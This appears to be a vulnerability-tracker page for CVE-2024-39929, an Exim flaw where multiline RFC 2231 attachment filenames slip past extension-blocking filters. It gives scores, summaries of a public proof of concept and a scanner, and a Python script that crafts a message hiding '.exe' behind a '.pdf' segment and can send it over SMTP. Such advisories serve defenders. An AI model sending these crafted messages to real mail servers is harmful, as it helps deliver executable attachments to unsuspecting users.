CVE-2024-39929

MEDIUM

Exim <= 4.97.1 - Improper Encoding or Escaping of Output via Multiline RFC 2231 Header Filename

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2024-39929. PoCs published by michael-david-fry, rxerium.

AI-analyzed exploit summary: the repository contains a functional Python script that exploits CVE-2024-39929 in Exim by sending a crafted email whose attachment filename is split across a multiline RFC 2231 header, so that the $mime_filename extension-blocking check does not see the real extension. The PoC demonstrates the vulnerability by delivering the message over SMTP and thereby getting a potentially executable attachment past the filter.

Description

Exim through 4.97.1 misparses a multiline RFC 2231 header filename (a filename parameter delivered as filename*0=, filename*1=, ... continuation segments split across folded header lines). $mime_filename therefore does not reflect the name a mail client reconstructs from all segments, so a remote attacker can bypass an ACL that blocks attachments by extension via $mime_filename and potentially deliver executable attachments to the mailboxes of end users. No authentication is required, but a user must still open the attachment (CVSS UI:R).
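To make the description and the PoC summary concrete, here is an added example that is not code from either PoC repository or from Exim. It builds a constructed message whose attachment filename arrives as two RFC 2231 continuation segments on two folded Content-Disposition lines, then runs two checks over it: a check that only takes the first filename segment (a stand-in for an extension filter whose filename variable holds only part of the name, which is the effect the CVE describes; Exim's own MIME parser is not reproduced) and a check that reassembles the full name the way a mail client does. The addresses, the base64 blob and the blocked-extension list are all constructed for the demonstration.

```python
"""Added example (not code from the PoC repositories or from Exim): a mail
gateway check that sees only the first RFC 2231 continuation segment of an
attachment filename, beside one that reassembles the whole name. The message
contents, addresses and the blocked-extension list are constructed here."""
import email
import re

# Extensions an attachment filter would refuse (constructed list).
BLOCKED_EXTENSIONS = {"exe", "bat", "cmd", "com", "scr", "js", "vbs"}

# Matches only the first filename parameter, plain or the *0 segment.
# Stands in for a check whose filename variable holds only part of the name.
_FIRST_FILENAME = re.compile(r'filename(?:\*0)?\s*=\s*"?([^";\r\n]*)', re.I)


def crafted_disposition(visible: str, hidden: str) -> str:
    """Content-Disposition value whose filename is split into two RFC 2231
    continuation segments on two folded lines; a checker that only takes
    the first segment sees `visible`, a client sees visible + hidden."""
    return f'attachment;\r\n filename*0="{visible}";\r\n filename*1="{hidden}"'


def build_message(disposition: str) -> str:
    """Constructed multipart message carrying the given Content-Disposition."""
    return (
        "From: sender@example.test\r\n"
        "To: victim@example.test\r\n"
        "Subject: quarterly report\r\n"
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/mixed; boundary="b1"\r\n'
        "\r\n"
        "--b1\r\n"
        "Content-Type: text/plain\r\n"
        "\r\n"
        "Please see the attached file.\r\n"
        "--b1\r\n"
        "Content-Type: application/octet-stream\r\n"
        f"Content-Disposition: {disposition}\r\n"
        "Content-Transfer-Encoding: base64\r\n"
        "\r\n"
        "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA==\r\n"  # constructed blob
        "--b1--\r\n"
    )


def naive_filename(content_disposition: str) -> str:
    """Filename as a checker sees it when it stops at the first segment."""
    m = _FIRST_FILENAME.search(content_disposition)
    return m.group(1) if m else ""


def reassembled_filename(raw_message: str) -> str:
    """Filename after the continuation segments are joined in order, which is
    what a mail client uses (the email module performs the RFC 2231 join)."""
    msg = email.message_from_string(raw_message)
    for part in msg.walk():
        name = part.get_filename()
        if name:
            return name
    return ""


def extension_of(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def is_blocked(filename: str) -> bool:
    return extension_of(filename) in BLOCKED_EXTENSIONS


def compare(raw_message: str) -> dict:
    """Run the partial and the reassembled check on one message."""
    msg = email.message_from_string(raw_message)
    disposition = next(
        (p["Content-Disposition"] for p in msg.walk() if p["Content-Disposition"]),
        "",
    )
    partial = naive_filename(disposition)
    full = reassembled_filename(raw_message)
    return {
        "partial_filename": partial,
        "partial_blocked": is_blocked(partial),
        "full_filename": full,
        "full_blocked": is_blocked(full),
    }


def deliver(raw_message: str, host: str, port: int = 25) -> None:
    """Hand the message to an SMTP listener you are authorised to test (how
    the public PoC exercises a gateway). Not called at import time."""
    import smtplib

    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.sendmail("sender@example.test", ["victim@example.test"], raw_message)


if __name__ == "__main__":
    crafted = build_message(crafted_disposition("quarterly-report.pdf", ".exe"))
    print(compare(crafted))
    print(compare(build_message('attachment; filename="invoice.exe"')))
```

For the crafted message the partial check reports `quarterly-report.pdf` and lets it through while the reassembled check reports `quarterly-report.pdf.exe` and blocks it; for a plain `filename="invoice.exe"` both agree. The point for a defender is that any extension policy has to run on the name a client will reconstruct, not on a single parameter or header line; the fix on the Exim side is to run a release newer than 4.97.1, and `deliver()` should only be pointed at a gateway you are authorised to test.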

Exploits (2)

nomisec · working PoC · 5 stars
by michael-david-fry · poc
https://github.com/michael-david-fry/CVE-2024-39929

The repository contains a functional Python script that exploits CVE-2024-39929 in Exim by sending a crafted email with a malformed attachment filename to bypass file extension blocking mechanisms. The PoC demonstrates the vulnerability by leveraging SMTP to deliver potentially executable attachments.

Classification
Working Poc 90%
Attack Type
Other
Complexity
Moderate
Reliability
Reliable
Target: Exim <= 4.97.1
No auth needed
Prerequisites: List of SMTP servers in a file · Python 3.x · Network access to target SMTP servers
devstral-2 · analyzed Feb 18, 2026
nomisec · scanner · 3 stars
by rxerium · poc
https://github.com/rxerium/CVE-2024-39929

This repository contains a Nuclei template for detecting Exim versions (up to and including 4.97.1) affected by CVE-2024-39929, the bypass of MIME filename extension blocking via multiline RFC 2231 header parsing. The template matches the version string in the Exim SMTP banner and does not include exploit code. Because it matches only the banner, it will also flag distribution builds that backport the fix while keeping the old version string, and it cannot see hosts that suppress the version in the banner.

Classification
Scanner 90%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Exim through 4.97.1
No auth needed
Prerequisites: Network access to Exim SMTP service (ports 465/587)
devstral-2 · analyzed Feb 18, 2026

Scores

CVSS v3 5.4
EPSS 0.4123 (41.2%)
EPSS Percentile 98.5%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable no
Technical Impact partial

Details

CWE
CWE-116
Status published
Products (1)
exim/exim <= 4.97.1
Published Jul 04, 2024
Tracked Since Feb 18, 2026